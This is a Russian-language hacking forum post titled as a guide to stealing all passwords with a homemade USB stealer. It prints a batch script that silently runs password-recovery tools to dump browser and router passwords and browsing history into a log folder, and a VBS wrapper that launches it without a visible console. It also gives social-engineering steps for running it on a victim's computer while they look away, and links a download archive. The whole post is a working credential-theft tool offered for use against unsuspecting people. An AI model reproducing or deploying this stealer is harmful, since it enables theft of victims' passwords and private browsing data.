Black Moldova Community

Крадем все пассы или USB Stealer на коленке :D

Автор bratva, Июль 07, 2025, 11:29

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Печать
Вниз Страницы1
Действия пользователя
Июль 07, 2025, 11:29
Крадем все пассы или USB Stealer на коленке :D


Всем привет друзья! В этой статье я расскажу вам как с помощью небольшой социальной инженерии и стиллера, спиздить все пассы с браузеров а так же историю. Прошу прощения.. если весь софт и сам способ - БАЯН. Я не крал эту статью. НАШЕЛ - СОФТ, написал батник, и скрипт VBS. В итоге получился вот такой вот стиллер. Ниже я прикреплю ссылку на скачивание архива.. и на сканер VT. Софт старенький так что даже AVAST его видит как вирус.. только потому что софт просматривает куки браузера. Качать.. запускать.. тестить.. это всё на ваше усмотрение! Ну чтож.. начнём)

Пароли крадутся с браузеров Chrome, Opera, Firefox, IE. Так же пассы от роутера.. но это не точно я не проверял!

- Пройдемся по содержанию архива.

В корневой папке у нас есть 2 файла это usbs.bat и usbs.vbs. USBS.BAT - Это основной исполняющий файл.
Вот его код:

[USER=98981]@Echo[/USER] off

FOR %%A IN (%Date:/=%) DO SET Today=%%A
for /l %%a in (1,1,1) do if "!Today:~-1!"==" " set Today=!Today:~0,-1!
SET dynpathname=%TODAY%_%COMPUTERNAME%_%USERNAME%.txt

start usbs/WebBrowserPassView.exe /stext usbs/log/webbrowserpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/routerpassview.exe /stext usbs/log/routerpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/iepv.exe /stext usbs/log/iepv_%DYNPATHNAME%
start usbs/chromehistoryview.exe /stext usbs/log/chromehistoryview_%DYNPATHNAME%

ping -n 5 127.0.0.1 > nul

exit

Файл USBS.VBS - Является исполняемым.. он нужен для беспалевного запуска батника.
Вот его код:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "usbs.bat" & Chr(34), 0
Set WshShell = Nothing


В папочке USBS - у нас лежит весь исполняемый софт. И самое главное подпапка LOG - вот как раз в этой самой папочке и сохраняются все куки и история жертвы.

По моему.. всё.. нечего не забыл.

- Хочу сразу отметить то что кражу лучше производить следующим образом.
1. Скидываем все файлы из архива на флэшку.
2. Скрываем все файлы с помощью меню "Свойства".
3. И тут правило 5 секунд, пока жертва нихуя не видит, через адресную строку пишем следующее.. "БУКВА_USB:/usbs.vbs".

НЕ СТОИТ ЗАПУСКАТЬ БАТНИК, ТАК КАК ВЫЛЕЗЕТ КОНСОЛЬ!

Готово! Теперь все файлы куки и история хранятся в папочке USBS/LOG

VT: https://www.virustotal.com/ru/file/...87814a7935a89585db22b24c/analysis/1516688620/
СКАЧАТЬ: https://mega.nz/#!8K5XiD4D!YSxo-MY8KH0TU1dnw7bvsF3fgraoadu3Jr7zBrBvhgY

Пароль на архив: lolzteam.org
  • Like
    Dislike
    Love
    HaHa
    Angry
    Sad
    Party
Печать
Вверх Страницы1
Действия пользователя
Powered by SMFPacks Reactions Mod